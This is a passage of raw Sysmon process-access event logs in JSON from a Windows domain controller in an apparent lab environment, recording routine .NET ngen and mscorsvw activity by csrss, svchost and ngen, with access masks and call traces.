C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010476F0D00}\r\nTargetProcessId: 3104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.246","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010476F0D00}","TargetProcessId":"3104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6811,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.246\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010476F0D00}\r\nTargetProcessId: 3104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.246","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010476F0D00}","TargetProcessId":"3104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6812,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.277\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0462-5F25-0000-001011660C00}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.277","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0462-5F25-0000-001011660C00}","TargetProcessId":"3792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6813,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.277\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0462-5F25-0000-001011660C00}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.277","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0462-5F25-0000-001011660C00}","TargetProcessId":"3792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6814,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.292\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-001099720D00}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.292","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-001099720D00}","TargetProcessId":"3792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6815,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.355\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010CD760D00}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.355","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010CD760D00}","TargetProcessId":"756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6816,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.355\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010CD760D00}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.355","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010CD760D00}","TargetProcessId":"756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6817,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010CD760D00}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010CD760D00}","TargetProcessId":"756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6818,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.417\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010337A0D00}\r\nTargetProcessId: 3272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 